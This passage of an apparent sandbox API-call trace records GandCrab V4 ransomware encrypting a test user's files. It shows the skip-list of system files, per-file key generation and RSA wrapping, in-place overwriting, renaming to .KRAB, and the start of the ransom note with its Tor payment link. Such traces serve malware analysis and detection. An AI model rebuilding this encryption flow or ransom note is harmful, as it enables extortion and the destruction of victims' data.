lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YWHFzy9UAIlji.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YWHFzy9UAIlji.mp3" [0085.716] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.717] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YWHFzy9UAIlji.mp3.KRAB") returned 60 [0085.717] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YWHFzy9UAIlji.mp3") returned 55 [0085.717] lstrlenW (lpString=".mp3") returned 4 [0085.717] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.719] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0085.719] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.721] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YWHFzy9UAIlji.mp3") returned 55 [0085.721] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YWHFzy9UAIlji.mp3") returned 55 [0085.721] lstrcmpiW (lpString1="YWHFzy9UAIlji.mp3", lpString2="desktop.ini") returned 1 [0085.721] lstrcmpiW (lpString1="YWHFzy9UAIlji.mp3", lpString2="autorun.inf") returned 1 [0085.721] lstrcmpiW (lpString1="YWHFzy9UAIlji.mp3", lpString2="ntuser.dat") returned 1 [0085.721] lstrcmpiW (lpString1="YWHFzy9UAIlji.mp3", lpString2="iconcache.db") returned 1 [0085.721] lstrcmpiW (lpString1="YWHFzy9UAIlji.mp3", lpString2="bootsect.bak") returned 1 [0085.721] lstrcmpiW (lpString1="YWHFzy9UAIlji.mp3", lpString2="boot.ini") returned 1 [0085.721] lstrcmpiW (lpString1="YWHFzy9UAIlji.mp3", lpString2="ntuser.dat.log") returned 1 [0085.721] lstrcmpiW (lpString1="YWHFzy9UAIlji.mp3", lpString2="thumbs.db") returned 1 [0085.721] lstrcmpiW (lpString1="YWHFzy9UAIlji.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0085.721] lstrcmpiW (lpString1="YWHFzy9UAIlji.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.721] lstrcmpiW (lpString1="YWHFzy9UAIlji.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.721] lstrcmpiW (lpString1="YWHFzy9UAIlji.mp3", lpString2="ntldr") returned 1 [0085.721] lstrcmpiW (lpString1="YWHFzy9UAIlji.mp3", lpString2="NTDETECT.COM") returned 1 [0085.721] lstrcmpiW (lpString1="YWHFzy9UAIlji.mp3", lpString2="Bootfont.bin") returned 1 [0085.721] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.722] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011700) returned 1 [0085.723] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0085.724] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.724] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.724] CryptGenRandom (in: hProv=0x1011700, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0085.724] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0085.724] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.724] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011018) returned 1 [0085.726] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0085.727] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.727] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.727] CryptGenRandom (in: hProv=0x1011018, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0085.727] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0085.727] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.727] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0085.729] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1023cb8) returned 1 [0085.729] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.729] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.730] GetLastError () returned 0x0 [0085.730] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0085.730] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0085.730] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010820) returned 1 [0085.732] CryptImportKey (in: hProv=0x1010820, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1023cb8) returned 1 [0085.732] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.732] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.732] GetLastError () returned 0x0 [0085.732] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0085.733] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0085.733] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YWHFzy9UAIlji.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\ywhfzy9uailji.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0085.733] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.734] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.734] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x1186d, lpOverlapped=0x0) returned 1 [0085.750] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffee793, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.750] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1186d, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x1186d, lpOverlapped=0x0) returned 1 [0085.751] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0085.751] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.755] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.755] CloseHandle (hObject=0x3a8) returned 1 [0085.756] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.756] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YWHFzy9UAIlji.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\ywhfzy9uailji.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\YWHFzy9UAIlji.mp3.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\ywhfzy9uailji.mp3.krab")) returned 1 [0085.757] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.758] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0085.758] lstrcmpW (lpString1="ZO0ZpDselfmuMv9e2FBJ.wav", lpString2=".") returned 1 [0085.758] lstrcmpW (lpString1="ZO0ZpDselfmuMv9e2FBJ.wav", lpString2="..") returned 1 [0085.758] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="ZO0ZpDselfmuMv9e2FBJ.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ZO0ZpDselfmuMv9e2FBJ.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ZO0ZpDselfmuMv9e2FBJ.wav" [0085.759] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.759] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ZO0ZpDselfmuMv9e2FBJ.wav.KRAB") returned 67 [0085.759] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ZO0ZpDselfmuMv9e2FBJ.wav") returned 62 [0085.759] lstrlenW (lpString=".wav") returned 4 [0085.759] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.759] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".wav ") returned 5 [0085.760] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.760] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ZO0ZpDselfmuMv9e2FBJ.wav") returned 62 [0085.760] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ZO0ZpDselfmuMv9e2FBJ.wav") returned 62 [0085.760] lstrcmpiW (lpString1="ZO0ZpDselfmuMv9e2FBJ.wav", lpString2="desktop.ini") returned 1 [0085.760] lstrcmpiW (lpString1="ZO0ZpDselfmuMv9e2FBJ.wav", lpString2="autorun.inf") returned 1 [0085.760] lstrcmpiW (lpString1="ZO0ZpDselfmuMv9e2FBJ.wav", lpString2="ntuser.dat") returned 1 [0085.760] lstrcmpiW (lpString1="ZO0ZpDselfmuMv9e2FBJ.wav", lpString2="iconcache.db") returned 1 [0085.760] lstrcmpiW (lpString1="ZO0ZpDselfmuMv9e2FBJ.wav", lpString2="bootsect.bak") returned 1 [0085.760] lstrcmpiW (lpString1="ZO0ZpDselfmuMv9e2FBJ.wav", lpString2="boot.ini") returned 1 [0085.760] lstrcmpiW (lpString1="ZO0ZpDselfmuMv9e2FBJ.wav", lpString2="ntuser.dat.log") returned 1 [0085.760] lstrcmpiW (lpString1="ZO0ZpDselfmuMv9e2FBJ.wav", lpString2="thumbs.db") returned 1 [0085.760] lstrcmpiW (lpString1="ZO0ZpDselfmuMv9e2FBJ.wav", lpString2="KRAB-DECRYPT.html") returned 1 [0085.760] lstrcmpiW (lpString1="ZO0ZpDselfmuMv9e2FBJ.wav", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.760] lstrcmpiW (lpString1="ZO0ZpDselfmuMv9e2FBJ.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.760] lstrcmpiW (lpString1="ZO0ZpDselfmuMv9e2FBJ.wav", lpString2="ntldr") returned 1 [0085.760] lstrcmpiW (lpString1="ZO0ZpDselfmuMv9e2FBJ.wav", lpString2="NTDETECT.COM") returned 1 [0085.761] lstrcmpiW (lpString1="ZO0ZpDselfmuMv9e2FBJ.wav", lpString2="Bootfont.bin") returned 1 [0085.761] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.761] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10113d0) returned 1 [0085.763] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0085.763] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.763] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.763] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0085.763] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0085.764] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.764] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0085.767] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0085.767] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.768] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.768] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0085.768] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0085.768] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.768] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011700) returned 1 [0085.770] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1023cb8) returned 1 [0085.770] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.770] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.770] GetLastError () returned 0x0 [0085.770] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0085.770] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0085.770] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10114e0) returned 1 [0085.772] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1023cb8) returned 1 [0085.773] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.773] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.773] GetLastError () returned 0x0 [0085.773] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0085.773] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0085.773] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ZO0ZpDselfmuMv9e2FBJ.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\zo0zpdselfmumv9e2fbj.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0085.774] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.774] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.774] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x169c7, lpOverlapped=0x0) returned 1 [0085.790] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffe9639, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.790] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x169c7, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x169c7, lpOverlapped=0x0) returned 1 [0085.790] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0085.791] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.795] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.796] CloseHandle (hObject=0x3a8) returned 1 [0085.796] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.796] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ZO0ZpDselfmuMv9e2FBJ.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\zo0zpdselfmumv9e2fbj.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\ZO0ZpDselfmuMv9e2FBJ.wav.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\zo0zpdselfmumv9e2fbj.wav.krab")) returned 1 [0085.797] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.797] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0 [0085.797] FindClose (in: hFindFile=0xfbd920 | out: hFindFile=0xfbd920) returned 1 [0085.797] CloseHandle (hObject=0x434) returned 1 [0085.798] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0085.798] FindClose (in: hFindFile=0xfbd2a0 | out: hFindFile=0xfbd2a0) returned 1 [0085.798] CloseHandle (hObject=0x320) returned 1 [0085.798] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0085.798] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0085.798] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0085.798] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Application Data" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Application Data") returned="C:\\Users\\CIiHmnxMn6Ps\\Application Data" [0085.798] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Application Data", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\" [0085.798] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0085.798] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0085.799] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0085.799] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0085.799] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0085.799] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.799] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.799] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\\\KRAB-DECRYPT.txt") returned 56 [0085.800] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\application data\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.800] GetLastError () returned 0x50 [0085.800] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.800] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.801] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x21, wMilliseconds=0x3)) [0085.801] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.801] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0085.801] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0085.801] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\d2ca4a08d2ca4dee3d.lock") returned 62 [0085.801] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\application data\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0085.802] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.802] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.803] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\") returned 39 [0085.803] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\*" [0085.803] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Application Data\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0085.803] CloseHandle (hObject=0x320) returned 1 [0085.803] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0085.803] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0085.803] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0085.803] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Contacts" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts" [0085.803] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\" [0085.803] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0085.804] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0085.804] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0085.804] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0085.804] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0085.804] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.804] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.804] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\\\KRAB-DECRYPT.txt") returned 48 [0085.805] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Contacts\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\contacts\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0085.805] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB 